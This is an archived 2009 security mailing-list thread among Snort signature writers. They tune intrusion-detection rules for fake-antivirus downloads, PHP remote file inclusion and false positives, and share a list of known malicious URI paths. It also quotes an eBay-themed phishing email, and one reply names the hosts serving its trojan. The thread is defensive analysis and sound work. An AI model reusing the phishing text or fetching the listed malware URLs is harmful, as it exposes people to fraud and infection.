> 21   new             ssp/js/common.js                                   138      exploit kit / trojan oficla                       
> 22   new             ssp/files/annonce.pdf                              138      exploit kit / trojan oficla                       
> 23   new             ssp/files/sdfg.jar                                 138      exploit kit / trojan oficla                       
> 24   new             ssp/admin.php                                      138      exploit kit / trojan oficla                       
> 25   new             ssp/index.php                                      138      exploit kit / trojan oficla                       
> 26   new             ssp/load.exe                                       138      exploit kit / trojan oficla                       
> 27   new             ssp/loadjavad.php                                  138      exploit kit / trojan oficla                       
> 28   new             download/IAInstall.exe                             132      rogue antivirus downloader / internetantiviruspro 
> 29   none            installer_1.exe                                    118      rogue antivirus downloader / fakeplus             
> 30   none            op1.js=http://www.theriverlive.cn                  115      redirects to rogue antivirus                      
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>   

From jonkman at jonkmans.com  Mon Dec  7 09:57:16 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Mon, 7 Dec 2009 09:57:16 -0500
Subject: [Emerging-Sigs] Back At it
In-Reply-To: <F236CDCE34685A458D315422458642E201D30836@pine.nhrs.org>
References: <F236CDCE34685A458D315422458642E201D30836@pine.nhrs.org>
Message-ID: <F7D82BD0-860F-4692-9D00-5440649AEDF0@jonkmans.com>

They're still in there. I almost removed them, glad I didn't. 

Matt

On Dec 7, 2009, at 8:58 AM, Weir, Jason wrote:

> Seeing these start up again this morning - not sure if Matt removed the
> rules or not....
> 
> DHL_Label_97c78.zip
> Facebook_Password_6acd6.zip
> 
> -Jason
> 
> 
> _____________________________________________________________________________________________
> 
> Please visit www.nhrs.org to subscribe to NHRS email announcements and updates.
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From jonkman at jonkmans.com  Mon Dec  7 10:00:48 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Mon, 7 Dec 2009 10:00:48 -0500
Subject: [Emerging-Sigs] Malwareurl.com Top 30 Update
In-Reply-To: <4B1D0D8F.10508@packetmail.net>
References: <MAIL2wZ3FLwsldxWat60000002e@mail.nhrs.org>
	<4B1D0D8F.10508@packetmail.net>
Message-ID: <E9D32E4E-6337-45E1-B8C2-7FD9A175FA26@jonkmans.com>

You're all good, except we can't do within on a uricontent, the buffer is normalized so spacing may be inaccurate. 

Just removed that and they're all good. Posting now!

Matt

On Dec 7, 2009, at 9:13 AM, evilghost at packetmail.net wrote:

> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN - 
> Potential Fake AV GET installer.1.exe"; flow:established,to_server; 
> content:"GET "; depth:4; nocase; uricontent:"installer."; nocase; 
> uricontent:".exe"; nocase; within:5; pcre:"/installer\.\d+\.exe/Ui"; 
> classtype:trojan-activity; reference:url,www.malwareurl.com; 
> sid:2010xxx; rev:1;)
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN - 
> Potential Fake AV GET installer_1.exe"; flow:established,to_server; 
> content:"GET "; depth:4; nocase; uricontent:"installer_"; nocase; 
> uricontent:".exe"; nocase; within:5; pcre:"/installer_\d+\.exe/Ui"; 
> classtype:trojan-activity; reference:url,www.malwareurl.com; 
> sid:2010xxx; rev:1;)


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From jonkman at jonkmans.com  Mon Dec  7 10:20:17 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Mon, 7 Dec 2009 10:20:17 -0500
Subject: [Emerging-Sigs] FP [Fwd: alert: New event: ET USER_AGENTS
	Suspicious Mozilla User-Agent - Likely Fake (Mozilla/5.0)]
In-Reply-To: <4B1CEFCA.1050309@secnap.net>
References: <4B1CEFCA.1050309@secnap.net>
Message-ID: <9D6CE3BB-2AE6-4B68-B12B-8501F5FD3980@jonkmans.com>

I think your suggestion is a good way to help eliminate the Fps. Making the change now, thanks Michael!

Matt

On Dec 7, 2009, at 7:06 AM, Michael Scheidell wrote:

> 
> 12/07-08:58:17 TCP 10.100.10.151:1118 --> 76.13.14.40:80
> [1:2009295:4] ET USER_AGENTS Suspicious Mozilla User-Agent - Likely Fake 
> (Mozilla/5.0)
> [Classification: A Network Trojan was detected] [Priority: 1]
> 
> so many (legit?) programs try to fake user-agent in order to be 
> 'compatible'.  might not be worth chasing FP's, but maybe it beats just 
> disabling this family.
> 
> here is one, during yahoo chat:
> vcs2.msg.vip.ac4.yahoo.com
> 
> 000 : 47 45 54 20 2F 63 61 70 61 63 69 74 79 20 48 54   GET /capacity HT
> 010 : 54 50 2F 31 2E 31 0D 0A 43 61 63 68 65 2D 43 6F   TP/1.1..Cache-Co
> 020 : 6E 74 72 6F 6C 3A 20 6E 6F 2D 63 61 63 68 65 0D   ntrol: no-cache.
> 030 : 0A 48 6F 73 74 3A 20 76 63 73 32 2E 6D 73 67 2E   .Host: vcs2.msg.
> 040 : 79 61 68 6F 6F 2E 63 6F 6D 0D 0A 55 73 65 72 2D   yahoo.com..User-
> 050 : 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 35   Agent: Mozilla/5
> 060 : 2E 30 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20   .0..Connection:
> 070 : 43 6C 6F 73 65 0D 0A 0D 0A                        Close....
> 
> old rule:
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET 
> USER_AGENTS Suspicious Mozilla User-Agent - Likely Fake (Mozilla/5.0)"; 
> flow:to_server,established; content:"User-Agent\: Mozilla/5.0|0d 0a|"; 
> nocase; classtype:trojan-activity; 
> reference:url,doc.emergingthreats.net/2009295; 
> reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_Agents_Suspicious; 
> sid:2009295; rev:4;)
> 
> suggest:
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET 
> USER_AGENTS Suspicious Mozilla User-Agent - Likely Fake (Mozilla/5.0)"; 
> flow:to_server,established; content:"User-Agent\: Mozilla/5.0|0d 0a|"; 
> nocase; content: ! "Mozilla/5.0|0d 0a|Connection\: Close|0d0a0d0a|"; 
> classtype:trojan-activity; 
> reference:url,doc.emergingthreats.net/2009295; 
> reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_Agents_Suspicious; 
> sid:2009295; rev:5;)
> 
> 
> 
> 
> -- 
> Michael Scheidell, CTO
> Phone: 561-999-5000, x 1259
>> *| *SECNAP Network Security Corporation
> 
>    * Certified SNORT Integrator
>    * 2008-9 Hot Company Award Winner, World Executive Alliance
>    * Five-Star Partner Program 2009, VARBusiness
>    * Best Anti-Spam Product 2008, Network Products Guide
>    * King of Spam Filters, SC Magazine 2008
> 
> 
> _________________________________________________________________________
> This email has been scanned and certified safe by SpammerTrap(r). 
> For Information please see http://www.secnap.com/products/spammertrap/
> _________________________________________________________________________
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From jonkman at jonkmans.com  Mon Dec  7 11:22:27 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Mon, 7 Dec 2009 11:22:27 -0500
Subject: [Emerging-Sigs] Mugs Available!
Message-ID: <2D8A9AC9-EBA8-49F6-B6F8-C49602BAA066@jonkmans.com>

The mugs are here and available! Please take a moment to look them over and support the project! All proceeds go to cover infrastructure and sandnet costs.

http://www.emergingthreats.net/index.php/support-et-and-buy-et-schwag.html

Lanyards and Tshirts are still available too!

Matt

----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From jonkman at jonkmans.com  Mon Dec  7 13:58:19 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Mon, 7 Dec 2009 13:58:19 -0500
Subject: [Emerging-Sigs] what has happened to 2002997 / ET WEB PHP
	Remote File Inclusion (monster list http)
In-Reply-To: <4B1C0286.5090708@mare-system.de>
References: <4B1C0286.5090708@mare-system.de>
Message-ID: <D8BF527A-D1CC-435A-B126-6FF491805463@jonkmans.com>

I think we killed it by accident... putting it back up. Will look into what happened to it, I assume my mistake on the ruleset separations a couple months ago.

Thanks for pointing this out!

Matt

On Dec 6, 2009, at 2:14 PM, mex wrote:

> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB PHP Remote File Inclusion (monster list http)"; flow:established,to_server; uricontent:".php"; nocase; uricontent:"http"; nocase; pcre:"/(path|page|lib|dir|file|root|icon|lang(uage)?|folder|type|agenda|gallery|domain|calendar|settings|news|name|auth|prog|config|cfg|incl|ext|fad|mod|sbp|rf|id|df|[a-z](\[.*\])+)\s*=\s*https?/Ui"; reference:url,www.sans.org/top20/; classtype:web-application-attack; reference:url,doc.emergingthreats.net/2002997; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP; sid:2002997; rev:4;)


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From emerging at emergingthreats.net  Mon Dec  7 16:00:18 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Mon,  7 Dec 2009 16:00:18 -0500 (EST)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20091207210018.8C1B04504F@goliath.jonkmans.com>


[***] Results from Oinkmaster started Mon Dec  7 16:00:18 2009 [***]

[+++]          Added rules:          [+++]

 2002997 - ET WEB_SERVER Remote File Inclusion (monster list http) (emerging-web_server.rules)
 2010452 - ET TROJAN - Potential Fake AV GET installer.1.exe (emerging-current_events.rules)
 2010453 - ET TROJAN - Potential Fake AV GET installer_1.exe (emerging-current_events.rules)


[///]     Modified active rules:     [///]

 2009295 - ET USER_AGENTS Suspicious Mozilla User-Agent - Likely Fake (Mozilla/5.0) (emerging-user_agents.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-sid-msg.map (3):
        2002997 || ET WEB_SERVER Remote File Inclusion (monster list http) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP || url,doc.emergingthreats.net/2002997 || url,www.sans.org/top20/
        2010452 || ET TROJAN - Potential Fake AV GET installer.1.exe || url,www.malwareurl.com
        2010453 || ET TROJAN - Potential Fake AV GET installer_1.exe || url,www.malwareurl.com

     -> Added to emerging-sid-msg.map.txt (3):
        2002997 || ET WEB_SERVER Remote File Inclusion (monster list http) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP || url,doc.emergingthreats.net/2002997 || url,www.sans.org/top20/
        2010452 || ET TROJAN - Potential Fake AV GET installer.1.exe || url,www.malwareurl.com
        2010453 || ET TROJAN - Potential Fake AV GET installer_1.exe || url,www.malwareurl.com

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-sid-msg.map (16):
        2500528 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (265) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500529 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (265) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500530 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (266) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500531 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (266) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500532 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (267) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500533 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (267) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500534 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (268) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500535 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (268) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510528 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (265) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510529 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (265) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510530 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (266) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510531 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (266) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510532 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (267) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510533 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (267) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510534 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (268) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510535 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (268) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Removed from emerging-sid-msg.map.txt (16):
        2500528 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (265) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500529 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (265) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500530 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (266) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500531 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (266) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500532 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (267) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500533 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (267) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500534 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (268) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500535 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (268) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510528 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (265) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510529 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (265) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510530 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (266) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510531 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (266) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510532 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (267) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510533 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (267) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510534 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (268) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510535 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (268) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From cunningpike at gmail.com  Mon Dec  7 17:01:26 2009
From: cunningpike at gmail.com (CunningPike)
Date: Mon, 7 Dec 2009 14:01:26 -0800
Subject: [Emerging-Sigs] 2007711: ET TROJAN Srizbi registering with
	controller
Message-ID: <f1b6c340912071401w46777282n1de2d09435917a96@mail.gmail.com>

I'm seeing alerts on this rule associated with what I think is Halo
online game activity - anyone else? The port involved is 2302.

This is the sort of traffic we are seeing on the wire after the rule
fires an alert:

Count:1 Event#5.347574 2009-12-06 20:19:13
ET MALWARE SOCKSv5 UDP Proxy Inbound Connect Request (Windows Source)
67.161.16.105 -> 192.168.132.103
IPVer=4 hlen=5 tos=0 dlen=113 ID=0 flags=2 offset=0 ttl=52 chksum=44386
Protocol: 17 sport=2302 -> dport=1110

len=93 chksum=28461
Payload:
00 00 AB 01 00 53 6F 4C 20 63 6C 61 6E 2D 20 28 .....SoL clan- (
43 45 29 20 53 74 75 6E 74 69 6E 67 2F 77 68 61 CE) Stunting/wha
74 65 76 65 72 20 73 65 72 76 65 72 00 30 31 2E tever server.01.
30 30 2E 30 39 2E 30 36 32 30 00 30 00 31 36 00 00.09.0620.0.16.
63 6F 6C 64 73 6E 61 70 00 43 54 46 00 30 00 31 coldsnap.CTF.0.1
00 30 00 31 00                                  .0.1.

Some Googling of 'coldsnap.CTF' turns up a lot of references to Halo gaming.

CP

From evilghost at packetmail.net  Mon Dec  7 18:16:12 2009
From: evilghost at packetmail.net (evilghost@packetmail.net)
Date: Mon, 7 Dec 2009 17:16:12 -0600
Subject: [Emerging-Sigs] 2007711: ET TROJAN Srizbi registering
	withcontroller
In-Reply-To: <f1b6c340912071401w46777282n1de2d09435917a96@mail.gmail.com>
References: <f1b6c340912071401w46777282n1de2d09435917a96@mail.gmail.com>
Message-ID: <4B1D8CBC.1060208@packetmail.net>

It's Halo; 
http://www.game-monitor.com/haloce_GameServer/67.161.16.105:2302/SoL_clan-_CE_Stuntingwhatever_server.html

Perhaps a negated content against content:!"|00|server."; offset:44; on 
SID 2007711?

Double-check my offset please.

-evilghost

CunningPike wrote:
> I'm seeing alerts on this rule associated with what I think is Halo
> online game activity - anyone else? The port involved is 2302.
>
> This is the sort of traffic we are seeing on the wire after the rule
> fires an alert:
>
> Count:1 Event#5.347574 2009-12-06 20:19:13
> ET MALWARE SOCKSv5 UDP Proxy Inbound Connect Request (Windows Source)
> 67.161.16.105 -> 192.168.132.103
> IPVer=4 hlen=5 tos=0 dlen=113 ID=0 flags=2 offset=0 ttl=52 chksum=44386
> Protocol: 17 sport=2302 -> dport=1110
>
> len=93 chksum=28461
> Payload:
> 00 00 AB 01 00 53 6F 4C 20 63 6C 61 6E 2D 20 28 .....SoL clan- (
> 43 45 29 20 53 74 75 6E 74 69 6E 67 2F 77 68 61 CE) Stunting/wha
> 74 65 76 65 72 20 73 65 72 76 65 72 00 30 31 2E tever server.01.
> 30 30 2E 30 39 2E 30 36 32 30 00 30 00 31 36 00 00.09.0620.0.16.
> 63 6F 6C 64 73 6E 61 70 00 43 54 46 00 30 00 31 coldsnap.CTF.0.1
> 00 30 00 31 00                                  .0.1.
>
> Some Googling of 'coldsnap.CTF' turns up a lot of references to Halo gaming.
>
> CP
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>   

From wkitty42 at windstream.net  Mon Dec  7 18:35:44 2009
From: wkitty42 at windstream.net (waldo kitty)
Date: Mon, 07 Dec 2009 18:35:44 -0500
Subject: [Emerging-Sigs] Malwareurl.com Top 30 Update
In-Reply-To: <4B1D0D8F.10508@packetmail.net>
References: <MAIL2wZ3FLwsldxWat60000002e@mail.nhrs.org>
	<4B1D0D8F.10508@packetmail.net>
Message-ID: <4B1D9150.6020909@windstream.net>


these were the two i was commenting on the other day... the original rule (only 
one) that was posted and discussed used a pcre that allowed for the underscore 
or the dot in that same position... i'd have to go back in my mail archives to 
pull them out for comparison...

evilghost at packetmail.net wrote:
> Thoughts on:
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN - 
> Potential Fake AV GET installer.1.exe"; flow:established,to_server; 
> content:"GET "; depth:4; nocase; uricontent:"installer."; nocase; 
> uricontent:".exe"; nocase; within:5; pcre:"/installer\.\d+\.exe/Ui"; 
> classtype:trojan-activity; reference:url,www.malwareurl.com; 
> sid:2010xxx; rev:1;)
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN - 
> Potential Fake AV GET installer_1.exe"; flow:established,to_server; 
> content:"GET "; depth:4; nocase; uricontent:"installer_"; nocase; 
> uricontent:".exe"; nocase; within:5; pcre:"/installer_\d+\.exe/Ui"; 
> classtype:trojan-activity; reference:url,www.malwareurl.com; 
> sid:2010xxx; rev:1;)
> 
> Someone double-check me on the within, it's still early and I'm not sure 
> I understood what the manual was telling me.
> 
> -evilghost
> 
> 
> jason.weir at nhrs.org wrote:
>> MalewareURL.com Data Contains 48458 Entries - Here are the top 30 (9073)
>>
>> #    Signature       URI                                                Count    Description                                       
>> ----------------------------------------------------------------------------------------
>>
>> 1    none            cache/readme.pdf                                   941      exploits / redirects to exploits                  
>> 2    none            index.php                                          919      exploits / redirects to exploits                  
>> 3    2010222         ts/in.cgi?pepsi18                                  895      exploits / redirects to exploits                  
>> 4    none            o.js                                               744      redirects to rogue antivirus                      
>> 5    none            index.php                                          609      exploits                                          
>> 6    none            download/install.php                               584      rogue antivirus                                   
>> 7    new             downloader.php                                     364      fraudtool.win32.roguesecurity                     
>> 8    none            download/install.php                               331      rogue antivirus downloader / internetantiviruspro 
>> 9    none            cache/flash.swf                                    276      exploits / redirects to exploits                  
>> 10   none            load.php                                           257      exploits / trojan                                 
>> 11   none            download.php                                       246      rogue antivirus                                   
>> 12   none            cache/readme.pdf                                   227      exploits / trojan                                 
>> 13   none            img/index.html                                     225      redirects to trojan                               
>> 14   none            cache/flash.swf                                    207      exploits / trojan                                 
>> 15   2010440         flash-HQ-plugin.40000.exe                          187      fast flux trojan                                  
>> 16   2010050         download/Antivirus_21.exe                          165      rogue antivirus / personal antivirus - fakexpa    
>> 17   none            installer.1.exe                                    148      rogue antivirus downloader / fakeplus             
>> 18   2010221         3/installer/Installer.exe                          139      trojan fakerean                                   
>> 19   2010221         1/installer/Installer.exe                          139      trojan fakerean                                   
>> 20   2010221         2/installer/Installer.exe                          139      trojan fakerean                                   
>> 21   new             ssp/js/common.js                                   138      exploit kit / trojan oficla                       
>> 22   new             ssp/files/annonce.pdf                              138      exploit kit / trojan oficla                       
>> 23   new             ssp/files/sdfg.jar                                 138      exploit kit / trojan oficla                       
>> 24   new             ssp/admin.php                                      138      exploit kit / trojan oficla                       
>> 25   new             ssp/index.php                                      138      exploit kit / trojan oficla                       
>> 26   new             ssp/load.exe                                       138      exploit kit / trojan oficla                       
>> 27   new             ssp/loadjavad.php                                  138      exploit kit / trojan oficla                       
>> 28   new             download/IAInstall.exe                             132      rogue antivirus downloader / internetantiviruspro 
>> 29   none            installer_1.exe                                    118      rogue antivirus downloader / fakeplus             
>> 30   none            op1.js=http://www.theriverlive.cn                  115      redirects to rogue antivirus                      
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>>   
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> 


From wkitty42 at windstream.net  Mon Dec  7 18:37:32 2009
From: wkitty42 at windstream.net (waldo kitty)
Date: Mon, 07 Dec 2009 18:37:32 -0500
Subject: [Emerging-Sigs] what has happened to 2002997 / ET WEB
 PHP	Remote File Inclusion (monster list http)
In-Reply-To: <D8BF527A-D1CC-435A-B126-6FF491805463@jonkmans.com>
References: <4B1C0286.5090708@mare-system.de>
	<D8BF527A-D1CC-435A-B126-6FF491805463@jonkmans.com>
Message-ID: <4B1D91BC.4000208@windstream.net>

another thing may have been the SID number is short in the one posted (below)... 
i recall seeing at least one rule that had the missing zeros added to it but it 
wasn't this one, i don't believe...

Matt Jonkman wrote:
> I think we killed it by accident... putting it back up. Will look into what happened to it, I assume my mistake on the ruleset separations a couple months ago.
> 
> Thanks for pointing this out!
> 
> Matt
> 
> On Dec 6, 2009, at 2:14 PM, mex wrote:
> 
>> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB PHP Remote File Inclusion (monster list http)"; flow:established,to_server; uricontent:".php"; nocase; uricontent:"http"; nocase; pcre:"/(path|page|lib|dir|file|root|icon|lang(uage)?|folder|type|agenda|gallery|domain|calendar|settings|news|name|auth|prog|config|cfg|incl|ext|fad|mod|sbp|rf|id|df|[a-z](\[.*\])+)\s*=\s*https?/Ui"; reference:url,www.sans.org/top20/; classtype:web-application-attack; reference:url,doc.emergingthreats.net/2002997; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP; sid:2002997; rev:4;)
> 
> 
> ----------------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Open Information Security Foundation (OISF)
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> http://www.openinformationsecurityfoundation.org
> ----------------------------------------------------
> 
> PGP: http://www.jonkmans.com/mattjonkman.asc
> 
> 
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> 


From mail at mare-system.de  Tue Dec  8 03:25:20 2009
From: mail at mare-system.de (mex)
Date: Tue, 08 Dec 2009 09:25:20 +0100
Subject: [Emerging-Sigs] [Fwd: eBay Procedural Warning - Security Alert]
Message-ID: <4B1E0D70.8040706@mare-system.de>


can someone please explain why this (see mail below) works?
i see no xss, but it offers a malicious file for download
(esafe.exe, virustotal: 22/41) / trojan
http://www.virustotal.com/analisis/7989fb793198cb7516444d36725cb72e4426005ff9812c70cb026494c4bf3bce-1260260357



tsenx in advance, 


mex


-------- Original Message --------
Subject: 	eBay Procedural Warning - Security Alert
Date: 	Thu, 17 Dec 2009 10:16:53 +0200
From: 	eBay<Members at eBay.C0M>
Reply-To: 	<Members at eBay.C0M>
To: 	undisclosed-recipients:;



<http://www.ebay.com/>eBay Procedural Warning - Security Alert


Dear eBay Member,

We have detected security issues on behalf your account, in order to use
eBay in the future you have to download and install the eBay Security
Shield by following this steps:

1. Click here
<http://members.ebay.com/ws/eBayISAPI.dll?ViewUserPage&userid=captainoversteer&livehelp.ebay/offers/sotwere/userfree-softwere/getEbayS%20SecurityShield%20?%ll?ViewUserPage&userid=20a%20gll?ViewUserPage&userid=55%5e%R>
to download the eBay Security Shield
2. After the download is complete install the program
3. Log in to the sign in page and confirm the program installation

Please keep in mind that if you don?t install eBay Protection Shield,
you'll be subject to an account limitation. Once you have reached this
limit, you won't be able to access your account.


Regards,
eBay


Copyright ? 2009 eBay Inc. All Rights Reserved.
Designated trademarks and brands are the property of their respective
owners.

eBay and the eBay logo are trademarks of eBay Inc.


-- 


mex


Security InfoCenter   .:.   http://www.mare-system.de/sic
DONT PANIC            .:.   http://www.mare-system.de/emergency 
MARE System Kiel      .:.   http://www.mare-system.de

From jamie.riden at gmail.com  Tue Dec  8 03:48:14 2009
From: jamie.riden at gmail.com (Jamie Riden)
Date: Tue, 8 Dec 2009 08:48:14 +0000
Subject: [Emerging-Sigs] [Fwd: eBay Procedural Warning - Security Alert]
In-Reply-To: <4B1E0D70.8040706@mare-system.de>
References: <4B1E0D70.8040706@mare-system.de>
Message-ID: <17b0fcab0912080048n3d32da22p4863176b88f7e6d8@mail.gmail.com>

Nice! Don't know ebay that well, but seems to be just someone's home
page with some creative content and URL abuse.

>From the middle of the URL, "ViewUserPage&userid=captainoversteer&"
then a bunch of stuff which will get parsed as GET parameter, so
doesn't end up making any difference.

Images within the page are referenced from some unusual sources.
http://worldcuprugbynewzealand.com/images/Untitled-1_03.gif and
http://64.27.11.100/.download/int.PNG, and
http://moorehistory.homeip.net/eShield.exe for the exe itself.

cheers,
 Jamie

2009/12/8 mex <mail at mare-system.de>:
>
> can someone please explain why this (see mail below) works?
> i see no xss, but it offers a malicious file for download
> (esafe.exe, virustotal: 22/41) / trojan
> http://www.virustotal.com/analisis/7989fb793198cb7516444d36725cb72e4426005ff9812c70cb026494c4bf3bce-1260260357
>
>
>
> tsenx in advance,
>
>
> mex
>
>
> -------- Original Message --------
> Subject: ? ? ? ?eBay Procedural Warning - Security Alert
> Date: ? Thu, 17 Dec 2009 10:16:53 +0200
> From: ? eBay<Members at eBay.C0M>
> Reply-To: ? ? ? <Members at eBay.C0M>
> To: ? ? undisclosed-recipients:;
>
>
>
> <http://www.ebay.com/>eBay Procedural Warning - Security Alert
>
>
> Dear eBay Member,
>
